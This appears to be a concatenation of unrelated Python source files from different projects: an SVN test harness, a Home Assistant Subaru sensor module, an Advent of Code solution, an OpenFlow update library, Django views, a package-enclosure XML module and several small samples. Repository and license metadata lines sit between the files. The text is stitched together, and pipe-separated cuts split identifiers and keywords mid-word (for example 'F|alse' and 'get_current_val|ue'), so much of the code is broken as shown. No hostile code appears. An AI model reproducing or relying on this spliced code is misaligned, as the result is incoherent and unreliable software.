os.environ['SVN_DBG_STACKTRACES_TO_STDERR'] = 'y'
else:
windows = False
file_scheme_prefix = 'file://'
_exe = ''
_bat = ''
# The location of our mock svneditor script.
if windows:
svneditor_script = os.path.join(sys.path[0], 'svneditor.bat')
else:
svneditor_script = os.path.join(sys.path[0], 'svneditor.py')
# Username and password used by the working copies
wc_author = 'jrandom'
wc_passwd = 'rayjandom'
# Username and password used by the working copies for "second user"
# scenarios
wc_author2 = 'jconstant' # use the same password as wc_author
stack_trace_regexp = r'(?:.*subversion[\\//].*\.c:[0-9]*,$|.*apr_err=.*)'
# Set C locale for command line programs
os.environ['LC_ALL'] = 'C'
######################################################################
# The locations of the svn, svnadmin and svnlook binaries, relative to
# the only scripts that import this file right now (they live in ../).
# Use --bin to override these defaults.
svn_binary = os.path.abspath('../../svn/svn' + _exe)
svnadmin_binary = os.path.abspath('../../svnadmin/svnadmin' + _exe)
svnlook_binary = os.path.abspath('../../svnlook/svnlook' + _exe)
svnrdump_binary = os.path.abspath('../../svnrdump/svnrdump' + _exe)
svnsync_binary = os.path.abspath('../../svnsync/svnsync' + _exe)
svnversion_binary = os.path.abspath('../../svnversion/svnversion' + _exe)
svndumpfilter_binary = os.path.abspath('../../svndumpfilter/svndumpfilter' + \
_exe)
svnmucc_binary=os.path.abspath('../../svnmucc/svnmucc' + _exe)
entriesdump_binary = os.path.abspath('entries-dump' + _exe)
atomic_ra_revprop_change_binary = os.path.abspath('atomic-ra-revprop-change' + \
_exe)
wc_lock_tester_binary = os.path.abspath('../libsvn_wc/wc-lock-tester' + _exe)
wc_incomplete_tester_binary = os.path.abspath('../libsvn_wc/wc-incomplete-tester' + _exe)
######################################################################
# The location of svnauthz binary, relative to the only scripts that
# import this file right now (they live in ../).
# Use --tools to overide these defaults.
svnauthz_binary = os.path.abspath('../../../tools/server-side/svnauthz' + _exe)
svnauthz_validate_binary = os.path.abspath(
'../../../tools/server-side/svnauthz-validate' + _exe
)
# Location to the pristine repository, will be calculated from test_area_url
# when we know what the user specified for --url.
pristine_greek_repos_url = None
# Global variable to track all of our options
options = None
# End of command-line-set global variables.
######################################################################
# All temporary repositories and working copies are created underneath
# this dir, so there's one point at which to mount, e.g., a ramdisk.
work_dir = "svn-test-work"
# Constant for the merge info property.
SVN_PROP_MERGEINFO = "svn:mergeinfo"
# Constant for the inheritable auto-props property.
SVN_PROP_INHERITABLE_AUTOPROPS = "svn:auto-props"
# Constant for the inheritable ignores property.
SVN_PROP_INHERITABLE_IGNORES = "svn:global-ignores"
# Where we want all the repositories and working copies to live.
# Each test will have its own!
general_repo_dir = os.path.join(work_dir, "repositories")
|
general_wc_dir = os.path.join(work_dir, "working_copies")
# temp directory in which we will create our 'pristine' local
# repository and other scratch data. This should be removed when we
# quit and when we startup.
temp_dir = os.path.join(work_dir, 'local_tmp')
# (derivatives of the tmp dir.)
pristine_greek_repos_dir = os.path.join(temp_dir, "repos")
greek_dump_dir = os.path.join(temp_dir, "greekfiles")
default_config_dir = os.path.abspath(os.path.join(temp_dir, "config"))
#
# Our pristine greek-
|
tree state.
#
# If a test wishes to create an "expected" working-copy tree, it should
# call main.greek_state.copy(). That method will return a copy of this
# State object which can then be edited.
#
_item = svntest.wc.StateItem
greek_state = svntest.wc.State('', {
'iota' : _item("This is the file 'iota'.\n"),
'A' : _item(),
'A/mu' : _item("This is the file 'mu'.\n"),
'A/B' : _item(),
'A/B/lambda' : _item("This is the file 'lambda'.\n"),
'A/B/E' : _item(),
'A/B/E/alpha' : _item("This is the file 'alpha'.\n"),
'A/B/E/beta' : _item("This is the file 'beta'.\n"),
'A/B/F' : _item(),
'A/C' : _item(),
'A/D' : _item(),
'A/D/gamma' : _item("This is the file 'gamma'.\n"),
'A/D/G' : _item(),
'A/D/G/pi' : _item("This is the file 'pi'.\n"),
'A/D/G/rho' : _item("This is the file 'rho'.\n"),
'A/D/G/tau' : _item("This is the file 'tau'.\n"),
'A/D/H' : _item(),
'A/D/H/chi' : _item("This is the file 'chi'.\n"),
'A/D/H/psi' : _item("This is the file 'psi'.\n"),
'A/D/H/o
|
partofthething/home-assistant
|
homeassistant/components/subaru/sensor.py
|
Python
|
apache-2.0
| 7,898 | 0.000886 |
"""Support for Subaru sensors."""
import subarulink.const as sc
from homeassistant.components.sensor import DEVICE_CLASSES
from homeassistant.const import (
DEVICE_CLASS_BATTERY,
DEVICE_CLASS_TEMPERATURE,
DEVICE_CLASS_VOLTAGE,
LENGTH_KILOMETERS,
LENGTH_MILES,
PERCENTAGE,
PRESSURE_HPA,
TEMP_CELSIUS,
TIME_MINUTES,
VOLT,
VOLUME_GALLONS,
VOLUME_LITERS,
)
from homeassistant.util.distance import convert as dist_convert
from homeassistant.util.unit_system import (
IMPERIAL_SYSTEM,
LENGTH_UNITS,
PRESSURE_UNITS,
TEMPERATURE_UNITS,
)
from homeassistant.util.volume import convert as vol_convert
from .const import (
API_GEN_2,
DOMAIN,
ENTRY_COORDINATOR,
ENTRY_VEHICLES,
VEHICLE_API_GEN,
VEHICLE_HAS_EV,
VEHICLE_HAS_SAFETY_SERVICE,
VEHICLE_STATUS,
)
from .entity import SubaruEntity
L_PER_GAL = vol_convert(1, VOLUME_GALLONS, VOLUME_LITERS)
KM_PER_MI = dist_convert(1, LENGTH_MILES, LENGTH_KILOMETERS)
# Fuel Economy Constants
FUEL_CONSUMPTION_L_PER_100KM = "L/100km"
FUEL_CONSUMPTION_MPG = "mi/gal"
FUEL_CONSUMPTION_UNITS = [FUEL_CONSUMPTION_L_PER_100KM, FUEL_CONSUMPTION_MPG]
SENSOR_TYPE = "type"
SENSOR_CLASS = "class"
SENSOR_FIELD = "field"
SENSOR_UNITS = "units"
# Sensor data available to "Subaru Safety Plus" subscribers with Gen1 or Gen2 vehicles
SAFETY_SENSORS = [
{
SENSOR_TYPE: "Odometer",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.ODOMETER,
SENSOR_UNITS: LENGTH_KILOMETERS,
},
]
# Sensor data available to "Subaru Safety Plus" subscribers with Gen2 vehicles
API_GEN_2_SENSORS = [
{
SENSOR_TYPE: "Avg Fuel Consumption",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.AVG_FUEL_CONSUMPTION,
SENSOR_UNITS: FUEL_CONSUMPTION_L_PER_100KM,
},
{
SENSOR_TYPE: "Range",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.DIST_TO_EMPTY,
SENSOR_UNITS: LENGTH_KILOMETERS,
},
{
SENSOR_TYPE: "Tire Pressure FL",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.TIRE_PRESSURE_FL,
SENSOR_UNITS: PRESSURE_HPA,
},
{
SENSOR_TYPE: "Tire Pressure FR",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.TIRE_PRESSURE_FR,
SENSOR_UNITS: PRESSURE_HPA,
},
{
SENSOR_TYPE: "Tire Pressure RL",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.TIRE_PRESSURE_RL,
SENSOR_UNITS: PRESSURE_HPA,
},
{
SENSOR_TYPE: "Tire Pressure RR",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.TIRE_PRESSURE_RR,
SENSOR_UNITS: PRESSURE_HPA,
},
{
SENSOR_TYPE: "External Temp",
SENSOR_CLASS: DEVICE_CLASS_TEMPERATURE,
SENSOR_FIELD: sc.EXTERNAL_TEMP,
SENSOR_UNITS: TEMP_CELSIUS,
},
{
SENSOR_TYPE: "12V Battery Voltage",
SENSOR_CLASS: DEVICE_CLASS_VOLTAGE,
SENSOR_FIELD: sc.BATTERY_VOLTAGE,
SENSOR_UNITS: VOLT,
},
]
# Sensor data available to "Subaru Safety Plus" subscribers with PHEV vehicles
EV_SENSORS = [
{
SENSOR_TYPE: "EV Range",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.EV_DISTANCE_TO_EMPTY,
SENSOR_UNITS: LENGTH_MILES,
},
{
SENSOR_TYPE: "EV Battery Level",
SENSOR_CLASS: DEVICE_CLASS_BATTERY,
SENSOR_FIELD: sc.EV_STATE_OF_CHARGE_PERCENT,
SENSOR_UNITS: PERCENTAGE,
},
{
SENSOR_TYPE: "EV Time to Full Charge",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.EV_TIME_TO_FULLY_CHARGED,
SENSOR_UNITS: TIME_MINUTES,
},
]
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Subaru sensors by config_entry."""
coordinator = hass.data[DOMAIN][config_entry.entry_id][ENTRY_COORDINATOR]
vehicle_info = hass.data[DOMAIN][config_entry.entry_id][ENTRY_VEHICLES]
entities = []
for vin in vehicle_info.keys():
entities.extend(create_vehicle_sensors(vehicle_info[vin], coordinator))
async_add_entities(entities, True)
def create_vehicle_sensors(vehicle_info, coordinator):
"""Instantiate all available sensors for the vehicle."""
sensors_to_add = []
if vehicle_info[VEHICLE_HAS_SAFETY_SERVICE]:
sensors_to_add.extend(SAFETY_SENSORS)
if vehicle_info[VEHICLE_API_GEN] == API_GEN_2:
sensors_to_add.extend(API_GEN_2_SENSORS)
if vehicle_info[VEHICLE_HAS_EV]:
sensors_to_add.extend(EV_SENSORS)
return [
SubaruSensor(
vehicle_info,
coordinator,
s[SENSOR_TYPE],
s[SENSOR_CLASS],
s[SENSOR_FIELD],
s[SENSOR_UNITS],
)
for s in sensors_to_add
]
class SubaruSensor(SubaruEntity):
"""Class for Subaru sensors."""
def __init__(
self, vehicle_info, coordinator, entity_type, sensor_class, data_field, api_unit
):
"""Initialize the sensor."""
super().__init__(vehicle_info, coordinator)
self.hass_type = "sensor"
self.current_value = None
self.entity_type = entity_type
self.sensor_class = sensor_class
self.data_field = data_field
self.api_unit = api_unit
@property
def device_class(self):
"""Return the class of this device, from component DEVICE_CLASSES."""
if self.sensor_class in DEVICE_CLASSES:
return self.sensor_class
return super().device_class
@property
def state(self):
"""Return the state of the sensor."""
self.current_value = self.get_current_value()
if self.current_value is None:
return None
if self.api_unit in TEMPERATURE_UNITS:
return round(
self.hass.config.units.temperature(self.current_value, self.api_unit), 1
)
if self.api_unit in LENGTH_UNITS:
return round(
self.hass.config.units.length(self.current_value, self.api_unit), 1
)
if self.api_unit in PRESSURE_UNITS:
if self.hass.config.units == IMPERIAL_SYSTEM:
return round(
self.hass.config.units.pressure(self.current_value, self.api_unit),
1,
)
if self.api_unit in FUEL_CONSUMPTION_UNITS:
if self.hass.config.units == IMPERIAL_SYSTEM:
return round((100.0 * L_PER_GAL) / (KM_PER_MI * self.current_value), 1)
return self.current_value
@property
def unit_of_measurement(self):
"""Return the unit_of_measurement of the device."""
if self.api_unit in TEMPERATURE_UNITS:
return self.hass.config.units.temperature_unit
if self.api_unit in LENGTH_UNITS:
return self.hass.config.units.length_unit
if self.api_unit in PRESSURE_UNITS:
if self.hass.config.units == IMPERIAL_SYSTEM:
return self.hass.config.units.pressure_unit
return PRESSURE_HPA
if self.api_unit in FUEL_CONSUMPTION_UNITS:
if self.hass.config.units == IMPERIAL_SYSTEM:
return FUEL_CONSUMPTION_MPG
return FUEL_CONSUMPTION_L_PER_100KM
return self.api_unit
@property
def available(self):
"""Return if entity is available."""
last_update_success = super().available
if last_update_success and self.vin not in self.coordinator.data:
return F
|
alse
return last_update_success
def get_current_val
|
ue(self):
"""Get raw value from the coordinator."""
value = self.coordinator.data[self.vin][VEHICLE_STATUS].get(self.data_field)
if value in sc.BAD_SENSOR_VALUES:
value = None
if isinstance(value, str):
if "." in value:
value = float(value)
else:
value = int(value)
return value
|
andela-bojengwa/talk
|
venv/lib/python2.7/site-packages/django_filters/__init__.py
|
Python
|
mit
| 485 | 0.002062 |
# flake8
|
: noqa
from __future__ import absolute_import
from .filterset import FilterSet
from .filters import *
__version__ = '0.9.2'
def parse_version(version):
'''
'0.1.2-dev' -> (0, 1, 2, 'dev')
'0.1.2' -> (0, 1, 2)
'''
v = version.split('.')
v = v[:-1] + v[-1].split('-')
ret = []
for p in v:
if p.isdigit():
ret.append(int(p))
|
else:
ret.append(p)
return tuple(ret)
VERSION = parse_version(__version__)
|
sclarke/adventofcode2016
|
d07.py
|
Python
|
bsd-3-clause
| 1,196 | 0.001672 |
import re
with open('d07.txt') as f:
raw_input = f.readlines()
test_input = """abba[mnop]qrst
abcd[bddb]xyyx
aaaa[qwer]tyui
ioxxoj[asdfgh]zxcvbn
asdfasdf[qwerqwer]asdffdsa[12341234]zcxvzcv""".splitlines()
def group_finder(s):
head, _, tail = s.partition('[')
yield head
if tail:
yield from group_finder(tail)
re_abba = re.compile(r'.*([a-z])(?!\1)([a-z])\2\1')
total = 0
for line in raw_input:
line_groups = list(group_finder(line.replace(']', '[')))
ips = line_groups[::2]
hns = line_groups[1::2]
if any(re_abba.match(ip) for ip in ips) and not any(re_abba.match(hn) for hn in hns):
total += 1
print(total)
# part 2!
test_input = """aba[bab]xyz
xyx[xyx]xyx
aaa[kek]eke
zazbz[bzb]cdb""".splitlines()
import regex
re_aba = regex.compile(r'([a-z])(?!\1)([a-z])\1')
total = 0
for line in raw_input:
line_groups = list(group_finder(line.replace(']', '[')))
ips = line_groups[::2]
hns = line_groups[1::2]
match = False
for ip in ips:
for a, b i
|
n re_aba.findall(ip, overlapped=True):
|
if any(b + a + b in hn for hn in hns):
match = True
if match:
total += 1
print(total)
|
XianliangJ/collections
|
CNUpdates/updates/update_lib.py
|
Python
|
gpl-3.0
| 49,836 | 0.00602 |
################################################################################
# The Frenetic Project #
# frenetic@frenetic-lang.org #
################################################################################
# Licensed to the Frenetic Project by one or more contributors. See the #
# NOTICE file distributed with this work for additional information #
# regarding copyright and ownership. The Frenetic Project licenses this #
# file to you under the following license. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided the following conditions are met: #
# - Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# - Redistributions in binary form must reproduce the above copyright #
# notice, this list of conditions and the following disclaimer in #
# the documentation or other materials provided with the distribution. #
# - The names of the copyright holds and contributors may not be used to #
# endorse or promote products derived from this work without specific #
# prior written permission. #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT #
# WARR
|
ANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the #
# LICENSE file distributed with this wo
|
rk for specific language governing #
# permissions and limitations under the License. #
################################################################################
# /updates/update_lib.py #
# Update Library Functions #
################################################################################
from collections import defaultdict
import sys, os
from time import time
sys.path.append(os.environ['NOX_CORE_DIR'])
from nox.lib.core import UINT32_MAX, openflow
from policy import *
import logging
from decimal import Decimal
import networkx as nx
from update import UpdateObject
log = logging.getLogger("frenetic.update.update_lib")
#############
# CONSTANTS #
#############
# maximum priority of OpenFlow rules
MAX_PRIORITY = 0xffff
####################
# GLOBAL VARIABLES #
####################
# inst
# * reference to currently running NOX component
# * also stores run-time structures used during updates
# - current_version: policy version
# - current_priority: OpenFlow priority level
# - current_internal_policy: policy for versioned traffic
# - current_edge_policy: policy for unversioned traffic
# - active_flows: dictionary of active flows, used for per-flow updates
# - current_abstract_policy: unversioned policy equivalent to current
# - future_abstract_policy: unversioned policy we're updating to
# - concrete_policy: maps abstract rules to installed versioned rules
# - installed_priority: FIXME
# - stats: statistics
inst = None
experiment = False
DEBUG = True
def setup(_inst, _experiment):
"""
_inst: reference to current NOX component
sets inst to _inst and initializes run-time structures
"""
global inst
global experiment
inst = _inst
experiment = _experiment
inst.current_version = 0
inst.current_priority = MAX_PRIORITY
inst.current_internal_policy = NetworkPolicy()
inst.current_edge_policy = NetworkPolicy()
inst.active_flows = {}
inst.current_abstract_policy = NetworkPolicy()
inst.future_abstract_policy = NetworkPolicy()
inst.stats = UpdateStats()
inst.concrete_policy = defaultdict(lambda:defaultdict(lambda:[]))
inst.installed_priority = \
defaultdict(lambda:defaultdict(lambda:MAX_PRIORITY))
return
##############
# STATISTICS #
##############
# UpdateStats
class UpdateStats:
"""
Class whose objects represent statistics about the number of
policy updates, rule adds, and rule deletes.
"""
def __init__(self):
self.updates = 0
self.start_time = time()
self.installs = defaultdict(lambda:0)
self.modifies = defaultdict(lambda:0)
self.deletes = defaultdict(lambda:0)
self.current_rules = defaultdict(lambda:0)
self.current_abstract_rules = defaultdict(lambda:0)
self.future_abstract_rules = defaultdict(lambda:0)
self.max_overhead = defaultdict(lambda:0)
def tally_update(self, policy):
self.updates += 1
self.current_abstract_rules = self.future_abstract_rules
self.future_abstract_rules = {}
for switch, config in policy:
self.future_abstract_rules[switch] = Decimal(len(config))
def tally_install(self, switch):
self.installs[switch] += 1
self.current_rules[switch] += 1
def tally_overhead(self, switch, config):
"""
Calculates rule overhead, i.e. the maximum number of rules
actually installed at a time versus the minimal rules
required. So, if we had 2*N rules installed while
transitioning between configs of size N, the overhead would be
100%
"""
if switch in self.current_abstract_rules:
old_size = self.current_abstract_rules[switch]
else:
old_size = 0
if switch in self.future_abstract_rules:
new_size = self.future_abstract_rules[switch]
else:
new_size = 0
base_size = max(old_size, new_size)
extra_size = \
Decimal(self.current_rules[switch] - base_size + len(config))
overhead = extra_size/max(base_size, 1)
self.max_overhead[switch] = max(self.max_overhead[switch], overhead)
def tally_modify(self, switch):
self.modifies[switch] += 1
def tally_delete(self, switch):
self.deletes[switch] += 1
self.current_rules[switch] -= 1
def all_installs(self):
return sum(self.installs.values())
def all_modifies(self):
return sum(self.modifies.values())
def all_deletes(self):
return sum(self.deletes.values())
def all_operations(self):
return self.all_installs() + self.all_modifies()
def all_overheads(self):
return max(self.max_overhead.values())
def __str__(self):
s = " Update Statistics\n"
s += "--------------------------------------------\n"
s += "Switch\t(+)\t(-)\t(~)\tTotal\tOverhead\n"
s += "--------------------------------------------\n"
for switch in set(self.installs.keys()
+ self.deletes.keys()
+ self.modifies.keys()):
i = self.installs[switch]
d = self.deletes[switch]
m = self.modifies[switch]
o = self.max_overhead[switch]
s += "s%d\t%d\t%d\t%d\t%d\t%d%%\n" % (switch, i, d, m, i+d+m, 100*o)
s += "--------------------------------------------\n"
s += "total\t%d\t%d\t%d\t%d\t%d%%\t%.4f\n" % \
(self.all_installs(),
self.all_deletes(),
self.all_modifies(),
self.all_operations(),
100*self.all_overheads(),
time() - self.start_time)
return s
##########################################
# OPENFLOW-LEVEL INSTALL/DELETE COMMANDS #
##########################################
def install_rule(switch, pattern, actions, priority, idle_timeout):
""" Wrapper for OpenFlow add request """
inst.stats.tally_install(switch)
if not experiment:
inst.send_flow_command(switch,
|
michal-ruzicka/archivematica
|
src/dashboard/src/components/mcp/views.py
|
Python
|
agpl-3.0
| 1,507 | 0.005309 |
# This file is part of Archivematica.
#
# Copyright 2010-2013 Artefactual Systems Inc. <http://artefactual.com>
#
# Archivematica is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Archivematica is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Archivematica. If not, see <http://www.gnu.org/licenses/>.
from django.http import HttpResponse
from contrib.mcp.client import MCPClient
from lxml import etree
def execute(request):
result = ''
if 'uuid' in request.REQUEST:
client = MCPClient()
|
uuid = request.REQUEST.get('uuid', '')
choice = request.REQUEST.get('choice', '')
uid = request
|
.REQUEST.get('uid', '')
result = client.execute(uuid, choice, uid)
return HttpResponse(result, mimetype = 'text/plain')
def list(request):
client = MCPClient()
jobs = etree.XML(client.list())
response = ''
if 0 < len(jobs):
for job in jobs:
response += etree.tostring(job)
response = '<MCP>%s</MCP>' % response
return HttpResponse(response, mimetype = 'text/xml')
|
saintleva/limited-apt
|
src/limitedapt/enclosure.py
|
Python
|
gpl-3.0
| 8,559 | 0.008062 |
# Copyright (C) Anton Liaukevich 2011-2020 <leva.dev@gmail.com>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
'''Package "enclosure" structure description and processing'''
from lxml import etree
from .errors import *
class EveryError(Error): pass
class EveryAndDistinctError(EveryError): pass
class VersionsEveryAndDistinctError(EveryAndDistinctError): pass
class ArchAndVersionsEveryAndDistinctError(EveryAndDistinctError): pass
class CannonEnumerateEvery(EveryError): pass
class CannotAddExistingPackage(Error): pass
class EnclosureImportSyntaxError(XmlImportSyntaxError):
'''Syntax or semantic error while enclosure structure parsing'''
class Versions:
def __init__(self, isevery=False):
self.__isevery = isevery
self.__items = set()
@property
def isevery(self):
return self.__isevery
def __iter__(self):
if self.isevery:
raise CannonEnumerateEvery("Cannot enumerate every possible versions")
return iter(self.__items)
def __contains__(self, version):
return self.isevery or version in self.__items
def add(self, version):
if self.isevery:
raise VersionsEveryAndDistinctError("You must not add distinct versions where every added")
self.__items.add(version)
class ArchAndVersions:
def __init__(self, isevery=False):
self.__every = Versions() if isevery else None
self.__data = {}
@property
def isevery(self):
return self.__every is not None
@property
def every(self):
return self.__every
@every.setter
def every(self, value):
self.__every = value
def __iter__(self):
if self.isevery:
raise CannonEnumerateEvery("Cannot enumerate every possible architectures and versions")
return iter(self.__data.items())
def has_arch_version(self, arch, version):
if self.isevery:
return version in self.every
else:
#TODO: Is it right?
try:
return version in self.__data[arch]
except KeyError:
try:
return version in self.__data["all"]
except KeyError:
return False
def add(self, versions, arch=None):
if self.every:
assert arch is None
self.every = versions
else:
assert arch is not None
self.__data[arch] = versions
def add_single(self, version, arch=None):
if self.every:
assert arch is None
self.every.add(version)
else:
assert arch is not None
try:
self.__data[arch].add(version)
except KeyError:
versions = Versions()
versions.add(version)
self.__data[arch] = versions
class Enclosure:
def __init__(self):
self.__packages = {}
def __iter__(self):
return iter(self.__packages)
def __contains__(self, package):
try:
return self.__packages[package.name].has_arch_version(package.architecture, package.version)
except KeyError:
return False
|
def clear(self):
self.__packages.clear()
def add_package(self, name, arch_and_versions):
if name in self.__packages:
raise CannotAddExistingPackage("Package '{0}' is already in the eclosure".format(name))
self.__packages[name] = arch_and_versions
def add_versioned_package(self, versioned):
try:
self.__packages[versioned.
|
name].add_single(versioned.version, versioned.architecture)
except KeyError:
arch_and_versions = ArchAndVersions()
arch_and_versions.add_single(versioned.version, versioned.architecture)
self.__packages[versioned.name] = arch_and_versions
def export_to_xml(self, file):
root = etree.Element("enclosure")
for pkg, arch_and_versions in sorted(self.__packages.items(), key=lambda x: x[0]):
if arch_and_versions.isevery and arch_and_versions.every.isevery:
etree.SubElement(root, "fullpackage", name=pkg)
else:
package_element = etree.SubElement(root, "package", name=pkg)
if arch_and_versions.isevery:
everyarch_element = etree.SubElement(package_element, "everyarch")
for version in sorted(arch_and_versions.every):
etree.SubElement(everyarch_element, "version", number=version)
else:
for arch, versions in sorted(arch_and_versions, key=lambda x: x[0]):
arch_element = etree.SubElement(package_element, "arch", name=arch)
if versions.isevery:
etree.SubElement(arch_element, "everyversion")
else:
for version in sorted(versions):
etree.SubElement(arch_element, "version", number=version)
tree = etree.ElementTree(root)
tree.write(file, pretty_print=True, encoding="UTF-8", xml_declaration=True)
def import_from_xml(self, file):
try:
root = etree.parse(file).getroot()
self.clear()
for fullpackage_element in root.findall("fullpackage"):
arch_and_versions = ArchAndVersions(isevery=True)
arch_and_versions.every = Versions(isevery=True)
self.add_package(fullpackage_element.get("name"), arch_and_versions)
for package_element in root.findall("package"):
everyarch_element = package_element.find("everyarch")
if everyarch_element is not None:
arch_and_versions = ArchAndVersions(isevery=True)
everyversion_element = everyarch_element.find("everyversion")
if everyversion_element is not None:
arch_and_versions.every = Versions(isevery=True)
else:
versions = Versions()
for version_element in everyarch_element.findall("version"):
versions.add(version_element.get("number"))
arch_and_versions.add(versions)
else:
arch_and_versions = ArchAndVersions()
for arch_element in package_element.findall("arch"):
everyversion_element = arch_element.find("everyversion")
if everyversion_element is not None:
arch_and_versions.add(Versions(isevery=True), arch_element.get("name"))
else:
versions = Versions()
for version_element in arch_element.findall("version"):
versions.add(version_element.get("number"))
arch_and_versions.add(versions, arch_element.get("name"))
self.add_package(package_element.get("name"), arch_and_versions)
except (ValueError, LookupError, etree.XMLSyntaxError) as err:
raise EnclosureImportSyntaxError('''Syntax error has been appeared during importing
|
googleapis/python-dialogflow
|
samples/generated_samples/dialogflow_v2_generated_conversation_datasets_delete_conversation_dataset_sync.py
|
Python
|
apache-2.0
| 1,640 | 0.001829 |
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
|
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRA
|
NTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for DeleteConversationDataset
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-dialogflow
# [START dialogflow_v2_generated_ConversationDatasets_DeleteConversationDataset_sync]
from google.cloud import dialogflow_v2
def sample_delete_conversation_dataset():
# Create a client
client = dialogflow_v2.ConversationDatasetsClient()
# Initialize request argument(s)
request = dialogflow_v2.DeleteConversationDatasetRequest(
name="name_value",
)
# Make the request
operation = client.delete_conversation_dataset(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
# [END dialogflow_v2_generated_ConversationDatasets_DeleteConversationDataset_sync]
|
qilicun/python
|
python2/PyMOTW-1.132/PyMOTW/EasyDialogs/EasyDialogs_AskYesNoCancel.py
|
Python
|
gpl-3.0
| 390 | 0.012821 |
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2008 Dou
|
g Hellmann All rights reserved.
#
"""
"""
__version__ = "$Id$"
#end_pymotw_header
i
|
mport EasyDialogs
valid_responses = { 1:'yes',
0:'no',
-1:'cancel',
}
response = EasyDialogs.AskYesNoCancel('Select an option')
print 'You selected:', valid_responses[response]
|
we-inc/mms-snow-white-and-the-seven-pandas
|
webserver/apps/payments/views.py
|
Python
|
mit
| 3,518 | 0.002558 |
from rest_framework.response import Response
from rest_framework import status
from rest_framework import viewsets, mixins
from rest_framework.permissions import IsAuthenticated, IsAdminUser
from rest_framework.decorators import api_view, permission_classes
from apps.payments.models import Installment, RentalPaymentInfo
from apps.
|
markets.models import Market
from apps.booths.models import Booth
from apps.payments.serializers import
|
InstallmentSerializer, UploadReceiptSerializer, VerifyReceiptSerializer
class PaymentViewSet(viewsets.GenericViewSet, mixins.CreateModelMixin):
"""
### Pay with bank account
{\n
"payment_type": 1,
"market": 1,
"payment_method": 2,
"amount": 2000
}
### Pay with credit card
{\n
"payment_type": 1,
"market": 1,
"payment_method": 1,
"amount": 2000,
"credit_card": 1
}
### Pay with new credit card
{\n
"payment_type": 1,
"market": 1,
"new_credit_card": {
"card_number": "123456789",
"card_holder_name": "Bee",
"type": 1,
"expiry_date": "2020-07-01",
"verification_no": "123"
},
"save_new_credit_card": true,
"payment_method": 1,
"amount": 2000
}
"""
queryset = Installment.objects.all()
serializer_class = InstallmentSerializer
permission_classes = (IsAuthenticated,)
class UploadReceiptViewSet(viewsets.GenericViewSet, mixins.RetrieveModelMixin, mixins.UpdateModelMixin):
queryset = Installment.objects.all()
serializer_class = UploadReceiptSerializer
permission_classes = (IsAuthenticated,)
class VerifyReceiptViewSet(viewsets.GenericViewSet, mixins.ListModelMixin, mixins.RetrieveModelMixin,
mixins.UpdateModelMixin):
queryset = Installment.objects.filter(payment_method=Installment.BANK_TRANSFER,
verification_status=Installment.PENDING)
serializer_class = VerifyReceiptSerializer
permission_classes = (IsAuthenticated, IsAdminUser)
@api_view(['GET', ])
@permission_classes((IsAuthenticated, ))
def get_payment_status(request, *args, **kwargs):
market_id = kwargs.get('pk', None)
market = Market.objects.filter(pk=market_id)
if len(market) == 0:
return Response('Market does not exist', status=status.HTTP_400_BAD_REQUEST)
booths = Booth.objects.filter(market=market)
response = []
for booth in booths:
payment_info = dict()
payment_info['booth_id'] = booth.pk
payment_info['booth_number'] = booth.booth_number
approved_reservations = booth.approved_reservations.all()
if len(approved_reservations) != 0:
approved_reservation = approved_reservations[0]
try:
rental_payment_info = approved_reservation.rental_payment_info
payment_info['payment_status'] = rental_payment_info.status
payment_info['vendor_id'] = rental_payment_info.user.id
payment_info['vendor_name'] = rental_payment_info.user.first_name + ' ' + rental_payment_info.user.last_name
except:
payment_info['payment_status'] = 0
payment_info['vendor_id'] = approved_reservation.user.id
payment_info['vendor_name'] = approved_reservation.user.first_name + ' ' + approved_reservation.user.last_name
response.append(payment_info)
return Response(response, status=status.HTTP_200_OK)
|
ricardodeazambuja/BrianConnectUDP
|
examples/OutputNeuronGroup_brian.py
|
Python
|
cc0-1.0
| 2,857 | 0.014351 |
'''
Example of a spike receiver (only receives spikes)
In this example spikes are received and processed creating a raster plot at the end of the simulation.
'''
from brian import *
import numpy
from brian_multiprocess_
|
udp import BrianConnectUDP
# The main function with the NeuronGroup(s) and Synapse(s) must be named "main_NeuronGroup".
# It will receive two objects: input_Neuron_Group and the simulation_clock. The input_Neuron_Group
# will s
|
upply the input spikes to the network. The size of the spike train received equals NumOfNeuronsInput.
